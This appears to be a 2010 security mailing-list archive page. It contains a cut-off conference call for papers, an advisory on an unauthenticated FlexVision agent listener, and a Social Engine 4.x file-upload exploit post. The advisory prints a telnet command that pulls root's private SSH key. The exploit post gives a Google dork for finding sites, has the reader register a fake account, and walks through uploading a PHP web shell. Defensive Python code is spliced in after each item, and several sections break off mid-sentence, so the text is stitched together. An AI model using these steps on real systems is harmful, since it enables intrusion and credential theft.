evidence in many ways that play a more and more relevant role in
resolving cases.


Conference Goals

IMF's intent is to gather experts from throughout the world in order to
present and discuss recent technical and methodical advances in the
fields of IT security incident response and management and IT forensics.
The conference provides a platform for collaboration and exchange of
ideas between industry (both as users and solution providers), academia,
law-enforcement and other government bodies.


Conference Topics
--
The scope of IMF 2011 is broad and includes, but is not limited to the
following areas:

IT Security Incident Response

- Procedures and Methods of Incident Response
- Formats and Standardization for Incident Response
- Tools Supporting Incident Response
- Incident Analysis
- CERTs/CSIRTs
- Sources of Information, Information Exchange, Communities
- Dealing with Vulnerabilities (Vulnerability Response)
- Monitoring and Early Warning
- Education and Training
- Organizations
- Legal and Enterprise Aspects (Jurisdiction, Applicable Laws
  and Regulations)

IT Forensics

- Trends and Challenges in IT Forensics
- Application of forensic techniques in new areas
- Techniques, Tools and Procedures in IT Forensics
- Methods for the Gathering, Handling, Processing and Analysis of
  Digital Evidence
- Evidence Protection in IT Environments
- Standardization in IT Forensics
- Education and Training
- Organizations
- Legal and Enterprise Aspects (Jurisdiction, Applicable Laws and
  Regulations)


Submission Details
--
IMF invites to submit full papers, presenting novel and mature research
results as well as practice papers, describing best practices, case
studies or lessons learned of up to 20 pages.  Proposals for workshops,
discussions and presentations on practical methods and challenges are
also welcome.

All submissions must be written in English (see below), and either in
postscript or PDF format.  Authors of accepted papers must ensure that
their papers will be presented at the conference.
Submitted full papers must not substantially overlap papers that have
been published elsewhere or that are simultaneously submitted to a
journal or a conference with proceedings.

All submissions will be reviewed by the program committee and papers
accepted to be presented at the conference will be included in the
conference proceedings.

Details on the electronic submission procedure as well 

Security Advisory - FlexVision Listener Vulnerability

2010-12-27 Thread Victor Ribeiro Hora
=[ Tempest Security Intelligence - Advisory #02 / 2010 ]=
 
   Information Disclosure Vulnerability in FlexVision Agent Listener
   -
 
 
  Authors: Victor Ribeiro Hora victor *SPAM* tempest.com.br
http://tempest.com.br
   Tempest Security Intelligence - Brazil
 
 
=[ Table of Contents ]=
 
 1. Overview
 2. Detailed description
 3. Additional context & Solutions
 4. References
 5. Thanks
 
 
=[ Overview ]==
 
 * System affected: FlexVision Agent Listener 1.3 for Windows, Linux and
Solaris
   (other versions may be vulnerable)
 
 * Release date: 22 October 2010
 
 * Impact: Successful exploitation of this vulnerability may lead to
remote server sensitive information disclosure.
 
FlexVision [1] claims to be an IT service focused on hardware and
software management, offering features like capacity planning, SLA
monitoring and systems inventory. The service is used by several major
companies in Brazil, including banking, telecom, energy, health and
independent product sectors.
 
The vulnerability was found in the inventory agent listener or fval.
Exploitation of this weakness does not require any authentication and
may lead to remote disclosure of sensitive information from the server
running the agent.
 
Specifically, an attacker can download non-binary files, and list
running services, running processes and installed software. It seems
there is some active filtering for known sensitive data, but other
sensitive information may leak.
 
=[ Detailed description ]
 
FlexVision Inventory service has several agents (servers) to collect
data from different platforms and send them to a central console on the
network. These agents are installed on the hardware to be monitored and
listen for incoming client connections.
 
One of the agents that was analyzed is the FlexVision Actions Listener
1.3 for Linux, used for the inventory of Linux systems. This agent is
executed by a Linux binary called fval started at boot time through an
initscript in /etc/init.d/rc.fval. Apparently the fval binary executes a
chdir() to /opt/flex/plugins, then it opens a socket listening for
connections on port 3810/TCP in daemon mode.
 
As soon as the TCP Three-Way Handshake is completed, the agent keeps
waiting for commands to perform the various inventory functions. These
commands are interpreted as internal functions of the fval binary, such
as help, version, exit or run. 
 
Specifically, the run function expects a parameter. We noted that this
parameter is a bash script file in the /opt/flex/plugins directory. This
script is executed by the fval binary, and the output of the script is
returned on the same TCP connection to the central console application.
These commands are normally sent from a central console to the monitored
agent.
 
 As the connection is neither authenticated nor encrypted in any way, it
gives any computer that has access to the 3810/TCP port of any agent the
possibility of sending commands to be executed by the agent.
 
In spite of the fact that the agent uses an active filter for some well
known sensitive data (like password hashes in the shadow file, for
example), it is possible to get other not easily predictable but
sensitive data. Some special chars we tested were also filtered, such as
'*', ';', '&', and also white spaces, tabs and other special
delimiters used on bash and other shells.


The following is an example of the recovery of a private SSH RSA key
file that belongs to the root user on a Linux server:
 
---
 
v...@victim01:~$ telnet 192.168.1.1 3810
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
FVALrun symonfile.sh /root/.ssh id_rsa
-BEGIN RSA PRIVATE KEY-
---
 
Just like Linux fval, on Windows it's also possible to dump any
non-binary file. It's worth saying that as fval always runs as a
privileged user (Administrator/root), all the system files are
accessible and most of them are readable.
 
Windows hosts behave similarly. As soon as the Agent is installed, it is
registered as a System Service and runs at boot time. This service runs
the fval binary 
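The advisory describes the agent's run function handing plugin scripts to a shell over an unauthenticated connection, protected only by a denylist of shell characters. As an added illustration (not FlexVision's code; the plugin names, the HMAC scheme and the key are constructed assumptions), this Python sketch contrasts such a denylist with an allowlist plus per-command authentication, using the command line quoted above as a test input:

```python
import hmac
import re
from hashlib import sha256

# Denylist in the style the advisory describes: a few shell metacharacters
# are refused, everything else is passed on to the plugin script.
DENIED_CHARS = set("*;&")


def denylist_accepts(line: str) -> bool:
    """Passes any command that avoids the listed characters, so a request
    to read an arbitrary file is still accepted."""
    return not any(c in DENIED_CHARS for c in line)


# Hypothetical allowlist: plugin script -> (max argument count, argument regex).
# Only scripts named here may be handed to the 'run' function.
ALLOWED_PLUGINS = {
    "services.sh": (0, None),
    "processes.sh": (0, None),
    "packages.sh": (1, re.compile(r"[A-Za-z0-9._-]{1,64}")),
}

# Constructed pre-shared key; a real deployment would provision one per agent.
AGENT_KEY = b"constructed-example-key"


def validate_run(line: str) -> tuple:
    """Allowlist check for 'run <plugin> [args]'. Returns (accepted, reason)."""
    parts = line.split()
    if len(parts) < 2 or parts[0] != "run":
        return False, "not a run command"
    plugin, args = parts[1], parts[2:]
    if plugin not in ALLOWED_PLUGINS:
        return False, "unknown plugin %r" % plugin
    max_args, pattern = ALLOWED_PLUGINS[plugin]
    if len(args) > max_args:
        return False, "too many arguments"
    for arg in args:
        if not pattern.fullmatch(arg):
            return False, "argument %r rejected" % arg
    return True, "ok"


def tag_for(line: str) -> str:
    """Tag the console would attach to each command (constructed HMAC scheme)."""
    return hmac.new(AGENT_KEY, line.encode(), sha256).hexdigest()


def accept_command(line: str, tag: str) -> tuple:
    """Authenticate first, then apply the allowlist; the reason names the step."""
    if not hmac.compare_digest(tag_for(line), tag):
        return False, "bad authentication tag"
    return validate_run(line)
```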

Re: XSS vulnerability in ImpressCMS

2010-12-27 Thread sato-san
fixed with version 1.2.4


Social Engine 4.x (Music Plugin) Arbitrary File Upload Vulnerability

2010-12-27 Thread MyDoom2009
###
# Exploit Title: Social Engine 4.x (Music Plugin) Arbitrary File Upload
# Google Dork: inurl:user/auth/forgot
# Date: 22/12/2010
# Author: MyDoom ( Moroccan Hacker )
# Contact: mydoom2...@gmail.com
# Software Link: http://http://www.socialengine.net
# Version: Social Engine 4.x (should work on previous versions but not tested)
# Tested on: Windows 7 - Linux 3.6.33 2010 - Linux 3.6.18 2010 -
Windows Server 2003
# Greetz to : ALBoraaq Hackers ;) - Especially T3es
###
 
Vulnerable Javascript Source Code:
 
  window.addEvent('domready', function() { // wait for the content

    ...snip...

    // remove that line to select all files, or edit it, add more items
    typeFilter: {
      'Music (*.mp3,*.m4a,*.aac,*.mp4)': '*.mp3; *.m4a; *.aac; *.mp4'
    },
 
Description:
 
The file filter used in the code doesn't check the uploaded file but
only sets the type of files that can be viewed in the upload window,
so if we type *.* in the filename we will see all other files and
then we can upload any type of file.
 
Exploit:
 
[~] Step 1 : Find A social network using the Social Engine with MUSIC PLUGIN
 
[~] Step 2: Register A Fake Account
 
[~] Step 3: Click On Music Link in the menu or go to http://www..com/music
 
[~] Step 4: Click On Upload Music And Then Fill the Playlist info
 
[~] Step 5: Click On Add Music And Select The php file ( If you can
see php file in the upload window type *.* in the file name )
 
[~] Step 6: And Click on save music to playlist
 
[~] Step 7: You Will See the Music Player Move the Cursor on the php
filename and copy the link of the shell.
 
Generally it will be :
http://www.xxx.com/public/music_song/100/[numbers]/[user_id]/[some_numbers].php
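The post's point is that the typeFilter only shapes the browser's file dialog and is not a server-side control. As an added example (not Social Engine's code; the stored-name scheme and the content signatures used are my assumptions), this Python check enforces the same extension allowlist on the server, verifies the first bytes look like the declared audio container, and generates the stored filename itself so a client-chosen name never reaches the filesystem:

```python
import os
import secrets
from typing import Optional, Tuple

# The extensions the client-side typeFilter lists, now enforced on the server,
# each mapped to the content types that are acceptable for it.
ALLOWED_EXT = {
    ".mp3": {"mp3", "mpeg-audio"},
    ".aac": {"mpeg-audio"},
    ".m4a": {"mp4"},
    ".mp4": {"mp4"},
}


def sniff_audio(header: bytes) -> Optional[str]:
    """Identify the container from the first bytes of the file, or None."""
    if header[:3] == b"ID3":                                  # MP3 with ID3v2 tag
        return "mp3"
    if len(header) >= 2 and header[0] == 0xFF and (header[1] & 0xE0) == 0xE0:
        return "mpeg-audio"                                   # MPEG/ADTS frame sync
    if header[4:8] == b"ftyp":                                # ISO base media (MP4/M4A)
        return "mp4"
    return None


def validate_upload(filename: str, header: bytes) -> Tuple[bool, str, Optional[str]]:
    """Return (accepted, reason, stored_name).

    The stored name is random and server-generated; only the validated
    extension is taken from the client, so 'shell.php' or a double extension
    can never be written under a name the web server would execute."""
    base = os.path.basename(filename.replace("\\", "/"))    # strip any directories
    _, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_EXT:
        return False, "extension %r not allowed" % ext, None
    kind = sniff_audio(header)
    if kind not in ALLOWED_EXT[ext]:
        return False, "content does not look like %s" % ext, None
    return True, "ok", secrets.token_hex(16) + ext
```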